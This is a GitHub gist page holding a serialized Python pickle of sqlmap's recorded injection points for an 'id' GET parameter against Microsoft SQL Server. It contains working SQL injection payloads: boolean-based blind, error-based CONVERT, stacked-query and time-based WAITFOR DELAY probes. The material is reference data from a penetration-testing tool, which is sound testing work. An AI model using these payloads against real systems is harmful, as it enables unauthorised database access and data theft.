Skip to content

Instantly share code, notes, and snippets.

@postmodern
Created April 13, 2011 07:14
Show Gist options
  • Save postmodern/917112 to your computer and use it in GitHub Desktop.
Save postmodern/917112 to your computer and use it in GitHub Desktop.
injections used by sqlmap.py
ccopy_reg
_reconstructor
p0
(clib.core.datatype
injectionDict
p1
c__builtin__
dict
p2
(dp3
S'dbms'
p4
NsS'suffix'
p5
S''
p6
sS'clause'
p7
(lp8
I1
asS'ptype'
p9
I1
sS'dbms_version'
p10
NsS'prefix'
p11
g6
sS'place'
p12
S'GET'
p13
sS'os'
p14
S'Windows'
p15
sS'conf'
p16
g0
(clib.core.datatype
advancedDict
p17
g2
(dp18
S'regexp'
p19
NsS'textOnly'
p20
I00
sS'string'
p21
Nstp22
Rp23
(dp24
S'attribute'
p25
NsS'_advancedDict__initialised'
p26
I01
sbsS'parameter'
p27
Vid
p28
sS'data'
p29
g0
(g17
g2
(dp30
I1
g0
(g17
g2
(dp31
S'comment'
p32
g6
sS'matchRatio'
p33
F0.02
sS'vector'
p34
S'AND [INFERENCE]'
p35
sS'title'
p36
S'AND boolean-based blind - WHERE or HAVING clause'
p37
sS'where'
p38
I1
sS'payload'
p39
Vid=0 AND 8714=8714
p40
sS'templatePayload'
p41
Nstp42
Rp43
(dp44
g25
Nsg26
I01
sbsI2
g0
(g17
g2
(dp45
g32
g6
sg33
F0.02
sg34
S"AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))"
p46
sg36
S'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
p47
sg38
I1
sg39
Vid=0 AND 4424=CONVERT(INT,(CHAR(58)+CHAR(116)+CHAR(109)+CHAR(121)+CHAR(58)+(SELECT (CASE WHEN (4424=4424) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(110)+CHAR(117)+CHAR(97)+CHAR(58)))
p48
sg41
Nstp49
Rp50
(dp51
g25
Nsg26
I01
sbsI4
g0
(g17
g2
(dp52
g32
S'--'
p53
sg33
F0.02
sg34
S"; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]';--"
p54
sg36
S'Microsoft SQL Server/Sybase stacked queries'
p55
sg38
I1
sg39
Vid=0; WAITFOR DELAY '0:0:5';--
p56
sg41
Nstp57
Rp58
(dp59
g25
Nsg26
I01
sbsI5
g0
(g17
g2
(dp60
g32
S'--'
p61
sg33
F0.02
sg34
S"IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--"
p62
sg36
S'Microsoft SQL Server/Sybase time-based blind'
p63
sg38
I1
sg39
Vid=0 WAITFOR DELAY '0:0:5'--
p64
sg41
Nstp65
Rp66
(dp67
g25
Nsg26
I01
sbstp68
Rp69
(dp70
g25
Nsg26
I01
sbstp71
Rp72
(dp73
g25
Nsg26
I01
sb.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment